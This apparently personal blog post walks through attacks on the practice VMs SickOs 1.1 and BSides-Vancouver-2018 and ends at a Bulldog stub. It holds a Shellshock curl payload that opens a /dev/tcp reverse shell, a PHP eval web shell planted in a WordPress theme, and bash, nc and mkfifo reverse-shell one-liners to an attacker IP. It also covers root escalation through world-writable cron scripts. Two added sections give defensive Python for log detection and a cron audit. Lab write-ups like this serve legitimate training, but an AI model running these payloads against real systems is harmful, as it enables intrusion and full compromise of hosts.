L1ao's blog

The boring world has one more burden because of me


Vulnerable VM practice

Target VMs

SickOs 1.1

Host discovery

  • netdiscover

  • arp-scan -l

  • nmap -sP 192.168.221.1/24

  • nmap -sS -sV -T4 -A -p- -Pn 192.168.221.134

Found a web proxy

3128/tcp open   http-proxy Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved

8080/tcp closed http-proxy

Accessing 8080 directly is refused; go through the proxy on the target instead.


Vulnerability scanning

  • Run a nikto scan through the proxy: nikto -h 192.168.221.134 -useproxy http://192.168.221.134:3128

  • socks5://127.0.0.1:7890

  • Either exploit the CVE or go after the web admin backend.


  • Apache mod_cgi - 'Shellshock' Remote Command Injection - Linux remote Exploit (exploit-db.com)

    python exp.py payload=reverse rhost=192.168.221.134 lhost=172.17.112.3 lport=11122 proxy=192.168.221.134:3128 pages=/cgi-bin/status/

    Did not work.

    By hand:

    curl -v --proxy 192.168.221.134:3128 \
    http://192.168.221.134/cgi-bin/status -H "Referer: () { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id; exit"

    curl -v --proxy 192.168.221.134:3128 \
    192.168.221.134/cgi-bin/status -H "Referer: () { test;}; 0<&28-;exec 28<>/dev/tcp/172.17.112.3/11122;/bin/sh <&28 >&28 2>&28"

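An added defender-side example, not part of the original write-up: the curl requests above carry the Shellshock trigger in the Referer header, which Apache's combined log format records, so probes of this shape can be picked out of access logs after the fact. The log lines below are constructed to mirror the requests on this page; the field names and the regexes are my own.

```python
import re

# Apache "combined" LogFormat: client ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Shellshock trigger: an exported function body "() { ... }" with trailing commands after it
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')
CHECKED_FIELDS = ("referer", "ua", "req")

# Constructed sample: one ordinary page view, then two /cgi-bin/status requests carrying the
# write-up's payload, once in Referer and once in User-Agent. Because the requests went through
# the Squid proxy on the target itself, the client column shows the proxy rather than the origin;
# Squid's own access.log records the real client.
SAMPLE_LOG = """\
192.168.221.134 - - [27/Nov/2021:14:40:02 +0800] "GET /wolfcms/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.221.134 - - [27/Nov/2021:14:43:34 +0800] "GET /cgi-bin/status HTTP/1.1" 200 74 "() { test;}; echo 'Content-Type: text/plain'; echo; echo; /usr/bin/id; exit" "curl/7.74.0"
192.168.221.134 - - [27/Nov/2021:14:44:10 +0800] "GET /cgi-bin/status HTTP/1.1" 200 74 "-" "() { test;}; echo; /usr/bin/id"
"""


def parse_combined(line):
    """Split one combined-format line into named fields; None if it does not match."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None


def shellshock_field(entry):
    """Name of the first request-derived field holding a Shellshock function definition, else None."""
    for field in CHECKED_FIELDS:
        if SHELLSHOCK_RE.search(entry[field]):
            return field
    return None


def find_shellshock_probes(lines):
    """(client, request path, field) for every line that carries the trigger."""
    hits = []
    for line in lines:
        entry = parse_combined(line)
        if entry is None:
            continue
        field = shellshock_field(entry)
        if field:
            parts = entry["req"].split()
            path = parts[1] if len(parts) > 1 else entry["req"]
            hits.append((entry["ip"], path, field))
    return hits
```

Any hit against a CGI path is worth an alert on its own; a 200 response to such a request, as in the sample, means the handler ran and the host needs the bash update that closes the bug.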

getshell

Default Wolf CMS admin URL: http://192.168.221.134/wolfcms/?/admin

Default credentials: admin/admin

Upload a web shell, log in to it, and read the configuration file: it contains a password.


Try logging in as sickos with the password john@123


  • cat /etc/cron.d/automate to view the cron job
  • /var/www/connect.py
  • Write a reverse shell into it and a root shell comes back

Privilege escalation done.


BSides-Vancouver-2018-Workshop

Service scan

 nmap -sS -sV -T4 -A -p- -Pn 192.168.221.135
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-27 15:08 CST
Nmap scan report for bogon (192.168.221.135)
Host is up (0.0010s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.221.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 85:9f:8b:58:44:97:33:98:ee:98:b0:c1:85:60:3c:41 (DSA)
| 2048 cf:1a:04:e1:7b:a3:cd:2b:d1:af:7d:b3:30:e0:a0:9d (RSA)
|_ 256 97:e5:28:7a:31:4d:0a:89:b2:b0:25:81:d5:36:63:4c (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/backup_wordpress
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=11/27%OT=21%CT=1%CU=32261%PV=Y%DS=2%DC=T%G=Y%TM=61A1D9
OS:8D%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OP
OS:S(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST
OS:11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)EC
OS:N(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=C95%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)

Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)
HOP RTT ADDRESS
1 0.16 ms LAPTOP-3Q0LGQ5O.mshome.net (172.17.112.1)
2 0.63 ms bogon (192.168.221.135)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds
Anonymous login is allowed.
The file users.txt.bk contains:
abatchy
john
mai
anne
doomguy


Planting a web shell

Appearance -> Edit Themes -> header.php

Insert on the first line:

file_put_contents('./aaa.php', '<?php eval($_GET[1]);');

Save.

Visit aaa.php:

http://192.168.221.135/backup_wordpress/aaa.php?1=system('ls');

Code execution obtained.

Getting a shell

Reverse shell

bash -c "bash -i >& /dev/tcp/172.17.112.3/11133 0>&1"
nc 172.17.112.3 11133
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.17.112.3 11222 >/tmp/f

Alternatively, upload a small web shell, connect to it with AntSword, pull in a larger web shell, use that to spawn a reverse shell, and then switch to an interactive TTY.

python -c 'import pty;pty.spawn("/bin/bash")'   # interactive tty

Privilege escalation

Checking each user's files and browsing the directories turned up /usr/local/bin/cleanup with permissions 777. Its contents:

#!/bin/sh

rm -rf /var/log/apache2/* # Clean those damn logs!!

Change its contents to a reverse shell.

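An added defender-side example, not part of the original write-up, covering both escalations on this page (the world-writable /var/www/connect.py run from /etc/cron.d/automate on SickOs, and the 777 /usr/local/bin/cleanup here): an audit that parses cron.d entries and flags any command path anyone can write to, plus a sweep of a bin directory for world-writable files. The cron lines, file names and directory layout in demo() are constructed in a temporary directory.

```python
import os
import stat
import tempfile


def parse_cron_d_line(line):
    """Return (user, command) for a /etc/cron.d line; None for blank, comment or VAR=value lines."""
    s = line.strip()
    if not s or s.startswith("#") or "=" in s.split()[0]:
        return None
    if s.startswith("@"):                       # @reboot / @daily  user  command
        parts = s.split(None, 2)
    else:                                       # m h dom mon dow  user  command
        parts = s.split(None, 6)
        parts = [" ".join(parts[:5])] + parts[5:] if len(parts) == 7 else []
    return (parts[1], parts[2]) if len(parts) == 3 else None


def is_world_writable(path):
    """True when the 'other' write bit is set; missing paths are not reported."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except OSError:
        return False


def audit_cron_d(cron_text):
    """(user, path) for every absolute path in a cron command that anyone can modify."""
    findings = []
    for line in cron_text.splitlines():
        parsed = parse_cron_d_line(line)
        if parsed is None:
            continue
        user, command = parsed
        findings += [(user, tok) for tok in command.split()
                     if tok.startswith("/") and is_world_writable(tok)]
    return findings


def audit_bin_dir(dirpath):
    """Names of world-writable regular files in a directory such as /usr/local/bin."""
    return sorted(n for n in os.listdir(dirpath)
                  if os.path.isfile(os.path.join(dirpath, n)) and is_world_writable(os.path.join(dirpath, n)))


def demo():
    """Constructed layout: a 777 cron target, a 777 script beside it, and a 755 control script."""
    with tempfile.TemporaryDirectory() as root:
        connect, cleanup, ok = (os.path.join(root, n) for n in ("connect.py", "cleanup", "ok.sh"))
        for path, mode in ((connect, 0o777), (cleanup, 0o777), (ok, 0o755)):
            with open(path, "w") as f:
                f.write("#!/bin/sh\n")
            os.chmod(path, mode)
        cron = f"SHELL=/bin/sh\n* * * * * root {connect}\n*/5 * * * * www-data /bin/sh {ok}\n"
        return [(u, os.path.basename(p)) for u, p in audit_cron_d(cron)], audit_bin_dir(root)
```

Run against the real /etc/cron.d files and /usr/local/bin, a non-empty result means an unprivileged web user can turn a root cron job into a root shell, which is exactly what both boxes allow; the fix is chmod 755 (or 700) on the target and an owner of root.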

Takeaways

With no obvious entry point, brute-force users and passwords with wpscan.

Get familiar with WordPress privilege escalation methods.

Get familiar with reverse shell techniques.

Bulldog

Host discovery

netdiscover -r 192.168.0.0/24